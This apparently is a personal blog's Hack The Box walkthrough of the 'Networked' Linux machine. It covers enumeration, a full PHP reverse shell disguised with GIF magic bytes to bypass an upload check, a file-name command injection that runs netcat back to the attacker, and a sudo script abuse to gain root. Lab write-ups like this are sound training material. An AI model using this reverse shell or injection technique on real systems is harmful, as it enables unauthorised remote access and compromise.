Hack The Box Networked Writeup – 10.10.10.146

Hack The Box Networked is an easy Linux machine.

Lets start with nmap port scan as usual.

 ⚡ ⚙  root@ns09  ~/htb/networked  nmap -sC -sV -p- -oN nmap.txt 10.10.10.146
Starting Nmap 7.80 ( https://nmap.org ) at 2019-11-14 22:08 +03
Nmap scan report for 10.10.10.146
Host is up (0.098s latency).
Not shown: 65532 filtered ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.4 (protocol 2.0)
| ssh-hostkey:
| 2048 22:75:d7:a7:4f:81:a7:af:52:66:e5:27:44:b1:01:5b (RSA)
| 256 2d:63:28:fc:a2:99:c7:d4:35:b9:45:9a:4b:38:f9:c8 (ECDSA)
|_ 256 73:cd:a0:5b:84:10:7d:a7:1c:7c:61:1d:f5:54:cf:c4 (ED25519)
80/tcp open http Apache httpd 2.4.6 ((CentOS) PHP/5.4.16)
|_http-server-header: Apache/2.4.6 (CentOS) PHP/5.4.16
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
443/tcp closed https
Service detection performed. Please report any incorrect results at
https://nmap.org/submit/ .

I found two ports open with OpenSSH and an Apache webserver. Since both services are updated with the latest versions, I thought its waste of time to look for exploits and concentrated on webserver enumeration.

The webserver has no much information, however I found a interesting information in the source-code.

<html>
<body>
Hello mate, we're building the new FaceMash!</br>
Help by funding us and be the new Tyler&Cameron!</br>
Join us at the pool party this Sat to get a glimpse
<!-- upload and gallery not yet linked -->
</body>
</html>

I know that there is something behind this webserver, so I decided to directory brute force using GoBuster. I’m using “directory-list-2.3-medium.txt”. After running for a while, GoBuster discovered few virtual directories as below:

 ⚡ ⚙  root@ns09  ~/htb/networked  gobuster dir -u http://10.10.10.146 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php -t 100 -o dirs
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://10.10.10.146
[+] Threads:        100
[+] Wordlist:       /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Extensions:     php
[+] Timeout:        10s
===============================================================
2019/11/14 22:30:23 Starting gobuster
===============================================================
/uploads (Status: 301)
/photos.php (Status: 200)
/index.php (Status: 200)
/upload.php (Status: 200)
/lib.php (Status: 200)
/backup (Status: 301)

I started looking the directories one by one, but started with /backup because it seemed interesting to me. I navigate to /backup and I saw a backup.tar.

I downlload the backup.tar for further analysis, there are couple of php files. Upload.php and lib.php

After analyzing the upload.php and lib.php files I understood that the upload.php calls check_file_type function present in lib.php which further calls file_mime_type function which is also present in lib.php. It calls some of the function of the standard library in php which uses magic bytes to check whether it is an image.

I will use my favourite php reverse shell (from pentestmonkey) and append ‘magicbytes‘ to the start of the file. This makes the mimetype check php is using think it is an image file. 🙂

Here is my final reverse shell script: (12345.php.gif)

GIF89a;
<?php
set_time_limit (0);
$VERSION = "1.0";
$ip = '10.10.14.3';  // CHANGE THIS
$port = 3333;       // CHANGE THIS
$chunk_size = 1400;
$write_a = null;
$error_a = null;
$shell = 'uname -a; w; id; /bin/sh -i';
$daemon = 0;
$debug = 0;
if (function_exists('pcntl_fork')) {
	// Fork and have the parent process exit
	$pid = pcntl_fork();
	
	if ($pid == -1) {
		printit("ERROR: Can't fork");
		exit(1);
	}
	
	if ($pid) {
		exit(0);  // Parent exits
	}

	if (posix_setsid() == -1) {
		printit("Error: Can't setsid()");
		exit(1);
	}

	$daemon = 1;
} else {
	printit("WARNING: Failed to daemonise.  This is quite common and not fatal.");
}

chdir("/");

umask(0);
$sock = fsockopen($ip, $port, $errno, $errstr, 30);
if (!$sock) {
	printit("$errstr ($errno)");
	exit(1);
}

// Spawn shell process
$descriptorspec = array(
   0 => array("pipe", "r"),  
   1 => array("pipe", "w"),  
   2 => array("pipe", "w")   // stderr is a pipe that the child will write to
);

$process = proc_open($shell, $descriptorspec, $pipes);

if (!is_resource($process)) {
	printit("ERROR: Can't spawn shell");
	exit(1);
}


stream_set_blocking($pipes[0], 0);
stream_set_blocking($pipes[1], 0);
stream_set_blocking($pipes[2], 0);
stream_set_blocking($sock, 0);

printit("Successfully opened reverse shell to $ip:$port");

while (1) {
	if (feof($sock)) {
		printit("ERROR: Shell connection terminated");
		break;
	}

	if (feof($pipes[1])) {
		printit("ERROR: Shell process terminated");
		break;
	}

	$read_a = array($sock, $pipes[1], $pipes[2]);
	$num_changed_sockets = stream_select($read_a, $write_a, $error_a, null);

	if (in_array($sock, $read_a)) {
		if ($debug) printit("SOCK READ");
		$input = fread($sock, $chunk_size);
		if ($debug) printit("SOCK: $input");
		fwrite($pipes[0], $input);
	}

	if (in_array($pipes[1], $read_a)) {
		if ($debug) printit("STDOUT READ");
		$input = fread($pipes[1], $chunk_size);
		if ($debug) printit("STDOUT: $input");
		fwrite($sock, $input);
	}

	if (in_array($pipes[2], $read_a)) {
		if ($debug) printit("STDERR READ");
		$input = fread($pipes[2], $chunk_size);
		if ($debug) printit("STDERR: $input");
		fwrite($sock, $input);
	}
}

fclose($sock);
fclose($pipes[0]);
fclose($pipes[1]);
fclose($pipes[2]);
proc_close($process);

function printit ($string) {
	if (!$daemon) {
		print "$string\n";
	}
}

?> 


The revese shell was uploaded successfully using /upload.php

Here is my reverseshell php file disguising as a gif file.

I ran a ncat from my terminal and reload the photogallery, I had the reversehell as apache immidiatly.,

Privilege Escalation

I ahve the reverse shell but its the user apache who is love privilege user, Looking at the directories I found that there is user named “guly”. There are file in /home/guly directory seemed interesting to me. (‘crontab.guly’ and ‘check_attack.php’). Looking at the files I understood that crontab.guly is set to run check_attack.php every 3 minutes.

Here is the content of check_attack.php

<?php
require '/var/www/html/lib.php';
$path = '/var/www/html/uploads/';
$logpath = '/tmp/attack.log';
$to = 'guly';
$msg= '';
$headers = "X-Mailer: check_attack.php\r\n";
$files = array();
$files = preg_grep('/^([^.])/', scandir($path));
foreach ($files as $key => $value) {
$msg='';
if ($value == 'index.html') {
continue;
}
#echo "-------------\n";
#print "check: $value\n";
list ($name,$ext) = getnameCheck($value);
$check = check_ip($name,$value);
if (!($check[0])) {
echo "attack!\n";
# todo: attach file
file_put_contents($logpath, $msg, FILE_APPEND | LOCK_EX);
exec("rm -f $logpath");
exec("nohup /bin/rm -f $path$value > /dev/null 2>&1 &");
echo "rm -f $path$value\n";
mail($to, $msg, $msg, $headers, "-F$value");
}
}
?>

The code basically says that, all the files in the uploads folder that I previously uploaded, are being deleted. If we look closely at the code, this line in particular stands out:

exec("nohup /bin/rm -f $path$value > /dev/null 2>&1 &");

The value variable holds the name of a file and I can name it in such a way to execute code! As user apache I have write access in that directory, so all I need to do is go to the directory and create the appropriate named file.

sh-4.2$ cd /var/www/html/uploads
cd /var/www/html/uploads
sh-4.2$ touch ";nc 10.10.14.3 3333 -c bash"

Then I start to listen on the 3333 port and wait for the program to run and in coupole of minutes, I have the reverse shell as guly.

nc -nlvp 1235
listening on [any] 1235 ...
connect to [10.10.14.3] from (UNKNOWN) [10.10.10.146] 57202
whoami
guly

the user.txt was in Guly’s home directory

root@ns09:~# ncat -vlk 3333
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::3333
Ncat: Listening on 0.0.0.0:3333
Ncat: Connection from 10.10.10.146.
Ncat: Connection from 10.10.10.146:43690.
ls
check_attack.php
cowrootx86
crontab.guly
dirtycow
pspy64
user.txt
cat user.txt
526cfc2[---------]2c57d71c5

Getting the Root.txt

Running “sudo -l” I saw

sudo -l
Matching Defaults entries for guly on networked:
!visiblepw, always_set_home, match_group_by_gid, always_query_group_plugin, env_reset, env_keep="COLORS DISPLAY HOSTNAME HISTSIZE KDEDIR LS_COLORS", env_keep+="MAIL PS1 PS2 QTDIR USERNAME LANG LC_ADDRESS LC_CTYPE", env_keep+="LC_COLLATE LC_IDENTIFICATION LC_MEASUREMENT LC_MESSAGES", env_keep+="LC_MONETARY LC_NAME LC_NUMERIC LC_PAPER LC_TELEPHONE", env_keep+="LC_TIME LC_ALL LANGUAGE LINGUAS _XKB_CHARSET XAUTHORITY", secure_path=/sbin\:/bin\:/usr/sbin\:/usr/bin
User guly may run the following commands on networked:
(root) NOPASSWD: /usr/local/sbin/changename.sh
cat /usr/local/sbin/changename.sh

It means I can run this changename.sh file as root without a password.

The box is vulnerable for this : https://vulmon.com/exploitdetails?qidtp=maillist_fulldisclosure&qid=e026a0c5f83df4fd532442e1324ffa4f

[guly@networked sbin]$ sudo ./changename.sh
interface NAME:
nav1n was
interface PROXY_METHOD:
here
interface BROWSER_ONLY:
to
interface BOOTPROTO:
rooot
[root@networked]# whoami
root

And I got the root.txt

[root@networked /]# cd root
cd root
[root@networked ~]# cd root
[root@networked ~]# cd root
[root@networked ~]# ls
ls
bin
boot
dev
etc
home
lib
lib64
media
mnt
opt
proc
root
run
sbin
srv
sys
tmp
usr
var
root.txt
[root@networked ~]# ls
ls
root.txt
[root@networked ~]# root.txt
[root@networked ~]# cat root.txt
0a8ecd[----------]0dcb82

Thanks for reading.

Navin

Hey there, I'm Navin, a passionate Info-Sec enthusiast from Bahrain. I started this blog to share my knowledge. I usually write on HackTheBox machines and challenges, cybersecurity-related articles and bug-bounty. If you are an HTB user and like my articles, please respect here: Profile: https://www.hackthebox.eu/nav1n

You may also like...

Subscribe
Notify of
guest
0 Comments
Inline Feedbacks
View all comments
Sorry, that action is blocked.